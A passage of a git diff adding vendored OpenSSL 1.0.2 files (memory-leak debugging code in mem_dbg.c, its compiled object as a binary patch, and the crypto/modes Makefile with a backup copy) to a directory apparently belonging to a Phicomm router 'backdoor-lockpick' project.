+typedef struct mem_leak_st {
+    BIO *bio;
+    int chunks;
+    long bytes;
+} MEM_LEAK;
+
+static void print_leak_doall_arg(const MEM *m, MEM_LEAK *l)
+{
+    char buf[1024];
+    char *bufp = buf;
+    APP_INFO *amip;
+    int ami_cnt;
+    struct tm *lcl = NULL;
+    CRYPTO_THREADID ti;
+
+#define BUF_REMAIN (sizeof buf - (size_t)(bufp - buf))
+
+    if (m->addr == (char *)l->bio)
+        return;
+
+    if (options & V_CRYPTO_MDEBUG_TIME) {
+        lcl = localtime(&m->time);
+
+        BIO_snprintf(bufp, BUF_REMAIN, "[%02d:%02d:%02d] ",
+                     lcl->tm_hour, lcl->tm_min, lcl->tm_sec);
+        bufp += strlen(bufp);
+    }
+
+    BIO_snprintf(bufp, BUF_REMAIN, "%5lu file=%s, line=%d, ",
+                 m->order, m->file, m->line);
+    bufp += strlen(bufp);
+
+    if (options & V_CRYPTO_MDEBUG_THREAD) {
+        BIO_snprintf(bufp, BUF_REMAIN, "thread=%lu, ",
+                     CRYPTO_THREADID_hash(&m->threadid));
+        bufp += strlen(bufp);
+    }
+
+    BIO_snprintf(bufp, BUF_REMAIN, "number=%d, address=%08lX\n",
+                 m->num, (unsigned long)m->addr);
+    bufp += strlen(bufp);
+
+    BIO_puts(l->bio, buf);
+
+    l->chunks++;
+    l->bytes += m->num;
+
+    amip = m->app_info;
+    ami_cnt = 0;
+    if (!amip)
+        return;
+    CRYPTO_THREADID_cpy(&ti, &amip->threadid);
+
+    do {
+        int buf_len;
+        int info_len;
+
+        ami_cnt++;
+        memset(buf, '>', ami_cnt);
+        BIO_snprintf(buf + ami_cnt, sizeof buf - ami_cnt,
+                     " thread=%lu, file=%s, line=%d, info=\"",
+                     CRYPTO_THREADID_hash(&amip->threadid), amip->file,
+                     amip->line);
+        buf_len = strlen(buf);
+        info_len = strlen(amip->info);
+        if (128 - buf_len - 3 < info_len) {
+            memcpy(buf + buf_len, amip->info, 128 - buf_len - 3);
+            buf_len = 128 - 3;
+        } else {
+            BUF_strlcpy(buf + buf_len, amip->info, sizeof buf - buf_len);
+            buf_len = strlen(buf);
+        }
+        BIO_snprintf(buf + buf_len, sizeof buf - buf_len, "\"\n");
+
+        BIO_puts(l->bio, buf);
+
+        amip = amip->next;
+    }
+    while (amip && !CRYPTO_THREADID_cmp(&amip->threadid, &ti));
+
+#ifdef LEVITTE_DEBUG_MEM
+    if (amip) {
+        fprintf(stderr, "Thread switch detected in backtrace!!!!\n");
+        abort();
+    }
+#endif
+}
+
+static IMPLEMENT_LHASH_DOALL_ARG_FN(print_leak, const MEM, MEM_LEAK)
+
+void CRYPTO_mem_leaks(BIO *b)
+{
+    MEM_LEAK ml;
+
+    if (mh == NULL && amih == NULL)
+        return;
+
+    MemCheck_off();             /* obtain MALLOC2 lock */
+
+    ml.bio = b;
+    ml.bytes = 0;
+    ml.chunks = 0;
+    if (mh != NULL)
+        lh_MEM_doall_arg(mh, LHASH_DOALL_ARG_FN(print_leak), MEM_LEAK, &ml);
+    if (ml.chunks != 0) {
+        BIO_printf(b, "%ld bytes leaked in %d chunks\n", ml.bytes, ml.chunks);
+#ifdef CRYPTO_MDEBUG_ABORT
+        abort();
+#endif
+    } else {
+        /*
+         * Make sure that, if we found no leaks, memory-leak debugging itself
+         * does not introduce memory leaks (which might irritate external
+         * debugging tools). (When someone enables leak checking, but does not
+         * call this function, we declare it to be their fault.) XXX This
+         * should be in CRYPTO_mem_leaks_cb, and CRYPTO_mem_leaks should be
+         * implemented by using CRYPTO_mem_leaks_cb. (Also there should be a
+         * variant of lh_doall_arg that takes a function pointer instead of a
+         * void *; this would obviate the ugly and illegal void_fn_to_char
+         * kludge in CRYPTO_mem_leaks_cb. Otherwise the code police will come
+         * and get us.)
+         */
+        int old_mh_mode;
+
+        CRYPTO_w_lock(CRYPTO_LOCK_MALLOC);
+
+        /*
+         * avoid deadlock when lh_free() uses CRYPTO_dbg_free(), which uses
+         * CRYPTO_is_mem_check_on
+         */
+        old_mh_mode = mh_mode;
+        mh_mode = CRYPTO_MEM_CHECK_OFF;
+
+        if (mh != NULL) {
+            lh_MEM_free(mh);
+            mh = NULL;
+        }
+        if (amih != NULL) {
+            if (lh_APP_INFO_num_items(amih) == 0) {
+                lh_APP_INFO_free(amih);
+                amih = NULL;
+            }
+        }
+
+        mh_mode = old_mh_mode;
+        CRYPTO_w_unlock(CRYPTO_LOCK_MALLOC);
+    }
+    MemCheck_on();              /* release MALLOC2 lock */
+}
+
+#ifndef OPENSSL_NO_FP_API
+void CRYPTO_mem_leaks_fp(FILE *fp)
+{
+    BIO *b;
+
+    if (mh == NULL)
+        return;
+    /*
+     * Need to turn off memory checking when allocated BIOs ... especially as
+     * we're creating them at a time when we're trying to check we've not
+     * left anything un-free()'d!!
+     */
+    MemCheck_off();
+    b = BIO_new(BIO_s_file());
+    MemCheck_on();
+    if (!b)
+        return;
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    CRYPTO_mem_leaks(b);
+    BIO_free(b);
+}
+#endif
+
+/*
+ * FIXME: We really don't allow much to the callback.  For example, it has no
+ * chance of reaching the info stack for the item it processes.  Should it
+ * really be this way? -- Richard Levitte
+ */
+/*
+ * NB: The prototypes have been typedef'd to CRYPTO_MEM_LEAK_CB inside
+ * crypto.h If this code is restructured, remove the callback type if it is
+ * no longer needed. -- Geoff Thorpe
+ */
+
+/*
+ * Can't pass CRYPTO_MEM_LEAK_CB directly to lh_MEM_doall_arg because it is a
+ * function pointer and conversion to void * is prohibited. Instead pass its
+ * address
+ */
+
+typedef CRYPTO_MEM_LEAK_CB *PCRYPTO_MEM_LEAK_CB;
+
+static void cb_leak_doall_arg(const MEM *m, PCRYPTO_MEM_LEAK_CB *cb)
+{
+    (*cb) (m->order, m->file, m->line, m->num, m->addr);
+}
+
+static IMPLEMENT_LHASH_DOALL_ARG_FN(cb_leak, const MEM, PCRYPTO_MEM_LEAK_CB)
+
+void CRYPTO_mem_leaks_cb(CRYPTO_MEM_LEAK_CB *cb)
+{
+    if (mh == NULL)
+        return;
+    CRYPTO_w_lock(CRYPTO_LOCK_MALLOC2);
+    lh_MEM_doall_arg(mh, LHASH_DOALL_ARG_FN(cb_leak), PCRYPTO_MEM_LEAK_CB,
+                     &cb);
+    CRYPTO_w_unlock(CRYPTO_LOCK_MALLOC2);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_dbg.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem_dbg.o
new file mode 100644
index 0000000000000000000000000000000000000000..5c5c9bc0a22dea2a6a9c10185b85af88a292ccb8
GIT binary patch
literal 12640
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile
new file mode 100644
index 0000000..cbcbfad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile
@@ -0,0 +1,158 @@
+#
+# OpenSSL/crypto/modes/Makefile
+#
+
+DIR=	modes
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+MODES_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= cbc128.c ctr128.c cts128.c cfb128.c ofb128.c gcm128.c \
+	ccm128.c xts128.c wrap128.c
+LIBOBJ= cbc128.o ctr128.o cts128.o cfb128.o ofb128.o gcm128.o \
+	ccm128.o xts128.o wrap128.o $(MODES_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+#EXHEADER= store.h str_compat.h
+EXHEADER= modes.h
+HEADER=	modes_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+ghash-ia64.s:	asm/ghash-ia64.pl
+	$(PERL) asm/ghash-ia64.pl $@ $(CFLAGS)
+ghash-x86.s:	asm/ghash-x86.pl
+	$(PERL) asm/ghash-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+ghash-x86_64.s:	asm/ghash-x86_64.pl
+	$(PERL) asm/ghash-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-gcm-x86_64.s:	asm/aesni-gcm-x86_64.pl
+	$(PERL) asm/aesni-gcm-x86_64.pl $(PERLASM_SCHEME) > $@
+ghash-sparcv9.s:	asm/ghash-sparcv9.pl
+	$(PERL) asm/ghash-sparcv9.pl $@ $(CFLAGS)
+ghash-alpha.s:	asm/ghash-alpha.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/ghash-alpha.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+ghash-parisc.s:	asm/ghash-parisc.pl
+	$(PERL) asm/ghash-parisc.pl $(PERLASM_SCHEME) $@
+ghashv8-armx.S:	asm/ghashv8-armx.pl
+	$(PERL) asm/ghashv8-armx.pl $(PERLASM_SCHEME) $@
+ghashp8-ppc.s:	asm/ghashp8-ppc.pl
+	$(PERL) asm/ghashp8-ppc.pl $(PERLASM_SCHEME) $@
+
+# GNU make "catch all"
+ghash-%.S:	asm/ghash-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+ghash-armv4.o:	ghash-armv4.S
+ghashv8-armx.o:	ghashv8-armx.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cbc128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cbc128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cbc128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cbc128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cbc128.o: ../../include/openssl/symhacks.h cbc128.c modes_lcl.h
+ccm128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ccm128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ccm128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ccm128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ccm128.o: ../../include/openssl/symhacks.h ccm128.c modes_lcl.h
+cfb128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cfb128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cfb128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cfb128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cfb128.o: ../../include/openssl/symhacks.h cfb128.c modes_lcl.h
+ctr128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ctr128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ctr128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ctr128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ctr128.o: ../../include/openssl/symhacks.h ctr128.c modes_lcl.h
+cts128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cts128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cts128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cts128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cts128.o: ../../include/openssl/symhacks.h cts128.c modes_lcl.h
+gcm128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+gcm128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+gcm128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gcm128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+gcm128.o: ../../include/openssl/symhacks.h gcm128.c modes_lcl.h
+ofb128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ofb128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ofb128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ofb128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ofb128.o: ../../include/openssl/symhacks.h modes_lcl.h ofb128.c
+wrap128.o: ../../e_os.h ../../include/openssl/bio.h
+wrap128.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+wrap128.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+wrap128.o: ../../include/openssl/lhash.h ../../include/openssl/modes.h
+wrap128.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+wrap128.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+wrap128.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+wrap128.o: ../cryptlib.h wrap128.c
+xts128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+xts128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+xts128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+xts128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+xts128.o: ../../include/openssl/symhacks.h modes_lcl.h xts128.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile.bak
new file mode 100644
index 0000000..cbcbfad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile.bak
@@ -0,0 +1,158 @@
+#
+# OpenSSL/crypto/modes/Makefile
+#
+
+DIR=	modes
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+MODES_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= cbc128.c ctr128.c cts128.c cfb128.c ofb128.c gcm128.c \
+	ccm128.c xts128.c wrap128.c
+LIBOBJ= cbc128.o ctr128.o cts128.o cfb128.o ofb128.o gcm128.o \
+	ccm128.o xts128.o wrap128.o $(MODES_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+#EXHEADER= store.h str_compat.h
+EXHEADER= modes.h
+HEADER=	modes_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+ghash-ia64.s:	asm/ghash-ia64.pl
+	$(PERL) asm/ghash-ia64.pl $@ $(CFLAGS)
+ghash-x86.s:	asm/ghash-x86.pl
+	$(PERL) asm/ghash-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+ghash-x86_64.s:	asm/ghash-x86_64.pl
+	$(PERL) asm/ghash-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-gcm-x86_64.s:	asm/aesni-gcm-x86_64.pl
+	$(PERL) asm/aesni-gcm-x86_64.pl $(PERLASM_SCHEME) > $@
+ghash-sparcv9.s:	asm/ghash-sparcv9.pl
+	$(PERL) asm/ghash-sparcv9.pl $@ $(CFLAGS)
+ghash-alpha.s:	asm/ghash-alpha.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/ghash-alpha.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+ghash-parisc.s:	asm/ghash-parisc.pl
+	$(PERL) asm/ghash-parisc.pl $(PERLASM_SCHEME) $@
+ghashv8-armx.S:	asm/ghashv8-armx.pl
